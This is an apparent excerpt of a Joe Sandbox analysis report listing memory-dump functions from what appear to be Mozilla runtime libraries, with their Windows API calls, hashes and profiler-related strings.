Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: abd718d94072427d3682351b3df71329b4071b7895e1ec67b7b402a39eee324e
Instruction ID: d0d5d98123903890096fefdbaf02b66636b9415b3ff0843d4458c1b36f63bc2c
Opcode Fuzzy Hash: abd718d94072427d3682351b3df71329b4071b7895e1ec67b7b402a39eee324e
Instruction Fuzzy Hash: B2E171B1A002059FDF14CF69C590A9EBBB2FF88354F198168D9055B345E779ECC5CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6BAA9120 Relevance: 6.3, APIs: 5, Instructions: 98COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6BAA8242,?,00000000,?,6BA9B63F), ref: 6BAA9188
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6BAA8242,?,00000000,?,6BA9B63F), ref: 6BAA91BB
memcpy.VCRUNTIME140(00000000,00000008,0000000F,?,?,6BAA8242,?,00000000,?,6BA9B63F), ref: 6BAA91EB
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6BAA8242,?,00000000,?,6BA9B63F), ref: 6BAA9200
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6BAA8242,?,00000000,?,6BA9B63F), ref: 6BAA9219

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: malloc$freememcpy
String ID:
API String ID: 4259248891-0
Opcode ID: e50c061ac6788b37cb233d140e39184da8b7a31c5bef4651ab259d8d87737740
Instruction ID: a5232eecbcdec048ad6adde3b9aba1b0ac6317b926cfff4314c96d16819f9921
Opcode Fuzzy Hash: e50c061ac6788b37cb233d140e39184da8b7a31c5bef4651ab259d8d87737740
Instruction Fuzzy Hash: 62312431A006058FEF00CF6CDD4476A77A9EF81700F458A6AD856D7241FB36D989CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 6BA90800 Relevance: 6.3, APIs: 5, Instructions: 71COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6BADE7DC), ref: 6BA90838
memset.VCRUNTIME140(?,00000000,00000158), ref: 6BA9084C
EnterCriticalSection.KERNEL32(?), ref: 6BA908AF
LeaveCriticalSection.KERNEL32(?), ref: 6BA908BD
LeaveCriticalSection.KERNEL32(6BADE7DC), ref: 6BA908D5

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: CriticalSection$EnterLeave$memset
String ID:
API String ID: 837921583-0
Opcode ID: e3d1699a06bb7c8aaff192793971c679f3c95f9f1c9cd7f5f85e05df4a01ac55
Instruction ID: f32cc600072cb95ce5d23d4abcf58ceeae69eb444a8765b2e9f1505b49a428e3
Opcode Fuzzy Hash: e3d1699a06bb7c8aaff192793971c679f3c95f9f1c9cd7f5f85e05df4a01ac55
Instruction Fuzzy Hash: A921B330B243099BDF149F64E844BAEB3F9AF85744F44856CD509A7240DB39E481CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6BAB7170 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetTickCount64.KERNEL32 ref: 6BAB7250
EnterCriticalSection.KERNEL32(6BADF688), ref: 6BAB7277
__aulldiv.LIBCMT ref: 6BAB72C4
LeaveCriticalSection.KERNEL32(6BADF688), ref: 6BAB72F7

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
String ID:
API String ID: 557828605-0
Opcode ID: a01d0f7a30b45f44e0c91c05d60ef1eb0bacb021424e2e99dd7997b9847e746c
Instruction ID: ff403f6b98d8eea7eab09f22370fa45689b19e4739b94d02a6628e6a942d950b
Opcode Fuzzy Hash: a01d0f7a30b45f44e0c91c05d60ef1eb0bacb021424e2e99dd7997b9847e746c
Instruction Fuzzy Hash: 70519271E042698FCF08CFA8C850ABFB7B6FB89300F19861DD815A7750C775A942CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6BA9E390 Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6BA9E3E4
AcquireSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BA9E3F1
memset.VCRUNTIME140(?,00000000,?), ref: 6BA9E4AB

Part of subcall function 6BA65D40: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,?,?,?,6BA9D2DA,00000001), ref: 6BA65D66

ReleaseSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BA9E4F5
GetCurrentThreadId.KERNEL32 ref: 6BA9E577
AcquireSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BA9E584
ReleaseSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BA9E5DE
memset.VCRUNTIME140(?,00000000,00000000), ref: 6BA9E6DA
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6BA9E864
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BA9E883
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6BA9E8A6

Strings

MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6BA9E777
MOZ_PROFILER_STARTUP, xrefs: 6BA9E5A1, 6BA9E5CC, 6BA9E5FF, 6BA9E62A
MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6BA9E722, 6BA9E750, 6BA9E7A2
MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6BA9E826, 6BA9E850
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6BA9E655

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreememset$Xbad_function_call@std@@malloc
String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
API String ID: 905598890-53385798
Opcode ID: 0fd5e2dce92bcd2ce986c30bb66c31c67cd0d428083d52b50b2178ce78e51022
Instruction ID: cbc82ff64297eead50ca6ee1ed082255289b641fc2723a851daf1c03bc924b9b
Opcode Fuzzy Hash: 0fd5e2dce92bcd2ce986c30bb66c31c67cd0d428083d52b50b2178ce78e51022
Instruction Fuzzy Hash: D4416970A10615DFCF14DF28D490AAABBF1FF89304F04816DD8569B782D73AE895CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6BAADAE0 Relevance: 6.1, APIs: 4, Instructions: 113COMMON

Download Yara Rule

APIs

??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6BAADB86
??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6BAADC0E
free.MOZGLUE(?), ref: 6BAADC2E
free.MOZGLUE(?), ref: 6BAADC40

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: Impl@detail@mozilla@@Mutexfree
String ID:
API String ID: 3186548839-0
Opcode ID: ad36bae84a72fe7fda7848bdb5cb6de5ed0465bfaaaefc04df2a4798a3ea997f
Instruction ID: 6f02b4ffddb9b38b9a5ba59d26b79a226643c9ce3e636c02d3e69594386b954e
Opcode Fuzzy Hash: ad36bae84a72fe7fda7848bdb5cb6de5ed0465bfaaaefc04df2a4798a3ea997f
Instruction Fuzzy Hash: 3A417A756047009FCB10CF34C09865ABBF6BF88354F44886DE8AA87340EB35E881CB61

Uniqueness

Uniqueness Score: -1.00%

Function 6BAAA2B0 Relevance: 6.1, APIs: 4, Instructions: 90COMMON

Download Yara Rule

APIs

free.MOZGLUE(?), ref: 6BAAA315
?_Xbad_function_call@std@@YAXXZ.MSVCP140(?), ref: 6BAAA31F
free.MOZGLUE(00000000,?,?,?,?), ref: 6BAAA36A

Part of subcall function 6BA75E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6BA75EDB
Part of subcall function 6BA75E90: memset.VCRUNTIME140(6BAB7765,000000E5,55CCCCCC), ref: 6BA75F27
Part of subcall function 6BA75E90: LeaveCriticalSection.KERNEL32(?), ref: 6BA75FB2

Part of subcall function 6BAA2140: free.MOZGLUE(?,00000060,?,6BAA7D36,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BAA215D

free.MOZGLUE(00000000), ref: 6BAAA37C

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: free$CriticalSection$EnterLeaveXbad_function_call@std@@memset
String ID:
API String ID: 700533648-0
Opcode ID: c7f28ba1d27d6fd82819484af338715f3a6c229cdc62d4b7e26e82b3329d164a
Instruction ID: b9271684e2eef5e6b5222f229b2ef6bfc892f227c0d68eda8a6205143b300d2c
Opcode Fuzzy Hash: c7f28ba1d27d6fd82819484af338715f3a6c229cdc62d4b7e26e82b3329d164a
Instruction Fuzzy Hash: 7421F979A00624ABCF11AF16D541B5FBBEAEF85754F048065DD095B300D73AED82C6F2

Uniqueness

Uniqueness Score: -1.00%

Function 6BA75B50 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,6BA756EE,?,00000001), ref: 6BA75B85
EnterCriticalSection.KERNEL32(6BADF688,?,?,?,6BA756EE,?,00000001), ref: 6BA75B90
LeaveCriticalSection.KERNEL32(6BADF688,?,?,?,6BA756EE,?,00000001), ref: 6BA75BD8
GetTickCount64.KERNEL32 ref: 6BA75BE4

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: CriticalSection$Count64CounterEnterLeavePerformanceQueryTick
String ID:
API String ID: 2796706680-0
Opcode ID: 6a2b0725284ffa1f4cca18c1fa5f6d6863eab1b577ede7617123164b541bb15c
Instruction ID: e58c9ae8cbaefeb946d3df0fd085a2162bef3d85d727398c83c095893034bf2a
Opcode Fuzzy Hash: 6a2b0725284ffa1f4cca18c1fa5f6d6863eab1b577ede7617123164b541bb15c
Instruction Fuzzy Hash: 9621AD756093449FCF08DF28C85465ABBE5EBCE610F04C92EE99A83790DB30E805CB41

Uniqueness

Uniqueness Score: -1.00%

Function 6BAA1B80 Relevance: 6.1, APIs: 4, Instructions: 77threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6BAA1B98
AcquireSRWLockExclusive.KERNEL32(?,?,6BAA1D96,00000000), ref: 6BAA1BA1
ReleaseSRWLockExclusive.KERNEL32(?,?,6BAA1D96,00000000), ref: 6BAA1BB5
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BAA1C25

Part of subcall function 6BAA1C60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,6BAA759E,?,?), ref: 6BAA1CB4

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentNow@ReleaseStamp@mozilla@@ThreadTimeV12@_free
String ID:
API String ID: 3699359333-0
Opcode ID: 8bbb4dda165d23f980c0da5b2c640585b9200037a904e3c327bdef62e2514cc3
Instruction ID: a2dc820a8fe37ce87ed84a00412331c7115897e654ecc8a0e83eaadea5988887
Opcode Fuzzy Hash: 8bbb4dda165d23f980c0da5b2c640585b9200037a904e3c327bdef62e2514cc3
Instruction Fuzzy Hash: 6921BD70A04224ABDF009F26C88577FBBB4AB87B44F44445DD9125B281DB7DA882CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6BAB7B10 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6BAB7B51
__aulldiv.LIBCMT ref: 6BAB7B6C
__aulldiv.LIBCMT ref: 6BAB7B8B
__aulldiv.LIBCMT ref: 6BAB7BB1

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: __aulldiv
String ID:
API String ID: 3732870572-0
Opcode ID: d00a51c4c5f930f9caa17efa13413b4b30e460f116377f5c22957434e894d04c
Instruction ID: d1e24ba13b02d27c6fc7977584f962a9ebe56317843cee8cae355889d5f1b8ed
Opcode Fuzzy Hash: d00a51c4c5f930f9caa17efa13413b4b30e460f116377f5c22957434e894d04c
Instruction Fuzzy Hash: 79214DB1A006096FD714CF7DDC82E67B7F8EB85714B10863EE05ADB640E674A8408BA0

Uniqueness

Uniqueness Score: -1.00%

Function 6BAB7A10 Relevance: 6.1, APIs: 4, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 6BA6BF00: ??0ios_base@std@@IAE@XZ.MSVCP140(?,?,?,?,6BAB7A3F), ref: 6BA6BF11
Part of subcall function 6BA6BF00: ?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP140(?,00000000,?,6BAB7A3F), ref: 6BA6BF5D
Part of subcall function 6BA6BF00: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,6BAB7A3F), ref: 6BA6BF7E

?setprecision@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140(?,00000013,00000000), ref: 6BAB7A48
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_K@Z.MSVCP140(?,?), ref: 6BAB7A7A

Part of subcall function 6BA69830: free.MOZGLUE(?,?,?,6BAB7ABE), ref: 6BA6985B

??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 6BAB7AC0
??1ios_base@std@@UAE@XZ.MSVCP140 ref: 6BAB7AC8

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_streambuf@??0ios_base@std@@??1?$basic_streambuf@??1ios_base@std@@??6?$basic_ostream@?init@?$basic_ios@?setprecision@std@@D@std@@@2@_J@1@_Smanip@_U?$_V01@_V?$basic_streambuf@free
String ID:
API String ID: 3421697164-0
Opcode ID: 2732cb90cac70ae612874137bf7542b24729180531f5a059a961cbefcfd33d22
Instruction ID: ec1df5a8a179eaa1ae4b4c2847f29323802e57b1f812dbe50996febb968ce808
Opcode Fuzzy Hash: 2732cb90cac70ae612874137bf7542b24729180531f5a059a961cbefcfd33d22
Instruction Fuzzy Hash: B0215C756043049FCB14DF28D895A9EBBE5FFC9354F40882CE88A87351DB34E94ACB92

Uniqueness

Uniqueness Score: -1.00%

Function 6BAB7930 Relevance: 6.1, APIs: 4, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 6BA6BF00: ??0ios_base@std@@IAE@XZ.MSVCP140(?,?,?,?,6BAB7A3F), ref: 6BA6BF11
Part of subcall function 6BA6BF00: ?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP140(?,00000000,?,6BAB7A3F), ref: 6BA6BF5D
Part of subcall function 6BA6BF00: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,6BAB7A3F), ref: 6BA6BF7E

?setprecision@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140(?,00000012,00000000), ref: 6BAB7968
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_J@Z.MSVCP140(6BABA264,6BABA264), ref: 6BAB799A

Part of subcall function 6BA69830: free.MOZGLUE(?,?,?,6BAB7ABE), ref: 6BA6985B

??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 6BAB79E0
??1ios_base@std@@UAE@XZ.MSVCP140 ref: 6BAB79E8

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_streambuf@??0ios_base@std@@??1?$basic_streambuf@??1ios_base@std@@??6?$basic_ostream@?init@?$basic_ios@?setprecision@std@@D@std@@@2@_J@1@_Smanip@_U?$_V01@_V?$basic_streambuf@free
String ID:
API String ID: 3421697164-0
Opcode ID: 1ce7da06c96d33252a580cb5f0313cced44eab81874a5be7c3070b950fe6598a
Instruction ID: 3d84f17973ef04e324a91d2b79d19b852310015bc19a510fbbdffe62dec3a7d6
Opcode Fuzzy Hash: 1ce7da06c96d33252a580cb5f0313cced44eab81874a5be7c3070b950fe6598a
Instruction Fuzzy Hash: 7E218C756043049FCB04DF28D885A9EBBE5EFC9314F40882CE88A87351DB34E94ACB92

Uniqueness

Uniqueness Score: -1.00%

Function 6BABAAE0 Relevance: 6.1, APIs: 4, Instructions: 59threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6BABAAF8
EnterCriticalSection.KERNEL32(6BADF770,?,6BA7BF9F), ref: 6BABAB08
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,6BA7BF9F), ref: 6BABAB39
LeaveCriticalSection.KERNEL32(6BADF770,?,?,?,?,?,?,?,?,6BA7BF9F), ref: 6BABAB6B

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: CriticalSection$CurrentEnterLeaveThread_stricmp
String ID:
API String ID: 1951318356-0
Opcode ID: 83a55fed36b9e72454e922747ffdaf564819a186c5bff82fea079e25ce6dbf01
Instruction ID: 0de44a48af1c0f171870e9e3818c91ca3906a6f8951363ffa40795f1cab92446
Opcode Fuzzy Hash: 83a55fed36b9e72454e922747ffdaf564819a186c5bff82fea079e25ce6dbf01
Instruction Fuzzy Hash: A41130B1E042199FCF00DFA8D88999FBBB9FF893057444429E51597301EB35E94ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6BAA2050 Relevance: 6.0, APIs: 4, Instructions: 33threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6BAA205B
AcquireSRWLockExclusive.KERNEL32(?,?,?,00000000,?,6BAA201B,?,?,?,?,?,?,?,6BAA1F8F,?,?), ref: 6BAA2064
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6BAA208E
free.MOZGLUE(?,?,?,00000000,?,6BAA201B,?,?,?,?,?,?,?,6BAA1F8F,?,?), ref: 6BAA20A3

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 2047719359-0
Opcode ID: 95070693bdbb524671682d0578b5bd6942122f1185616b1a0071f798ed0bbaa6
Instruction ID: 6fbdfa6eed3859482f45d792acc86d62ef2cd9d6668f7ea863c83f14bf26ca7a
Opcode Fuzzy Hash: 95070693bdbb524671682d0578b5bd6942122f1185616b1a0071f798ed0bbaa6
Instruction Fuzzy Hash: E7F0B4B50047009BCB219F16D88475BBBF9EFCA324F10012EE54687710CB76E842CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 6BA9EB00 Relevance: 6.0, APIs: 4, Instructions: 30threadsynchronizationCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6BA9EB11
AcquireSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BA9EB1E
memset.VCRUNTIME140(?,00000000,000000E0), ref: 6BA9EB3C
ReleaseSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BA9EB5B
GetCurrentThreadId.KERNEL32 ref: 6BA9EBA4
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000), ref: 6BA9EBAC
GetCurrentThreadId.KERNEL32 ref: 6BA9EBC1
AcquireSRWLockExclusive.KERNEL32(6BADF4B8,?,?,00000000), ref: 6BA9EBCE
?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000,?,?,00000000), ref: 6BA9EBE5
ReleaseSRWLockExclusive.KERNEL32(6BADF4B8,00000000), ref: 6BA9EC37
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6BA9EC46
CloseHandle.KERNEL32(?), ref: 6BA9EC55
free.MOZGLUE(00000000), ref: 6BA9EC5C

Strings

[I %d/%d] profiler_start, xrefs: 6BA9EBB4
[I %d/%d] baseprofiler_save_profile_to_file(%s), xrefs: 6BA9EA9B

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: ExclusiveLock$CurrentThread$AcquireRelease$?profiler_init@baseprofiler@mozilla@@CloseHandleObjectSingleWait_getpidfreememset
String ID: [I %d/%d] baseprofiler_save_profile_to_file(%s)$[I %d/%d] profiler_start
API String ID: 2885072826-1186885292
Opcode ID: 10025132c38a6e8ab75370fac3a313eb33899285d3a630f058d8c27df6d4fab2
Instruction ID: 2271093b023a801af823087b4bdfc71923a9df3f55dc47ff9f2d973974b9fee2
Opcode Fuzzy Hash: 10025132c38a6e8ab75370fac3a313eb33899285d3a630f058d8c27df6d4fab2
Instruction Fuzzy Hash: C0F0A072209310EFDF006F69EC89B977BA4BBC2A55F04C02DE905D3241DB7AD486C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 6BAA20B0 Relevance: 6.0, APIs: 4, Instructions: 28threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6BAA20B7
AcquireSRWLockExclusive.KERNEL32(00000000,?,6BA8FBD1), ref: 6BAA20C0
ReleaseSRWLockExclusive.KERNEL32(00000000,?,6BA8FBD1), ref: 6BAA20DA
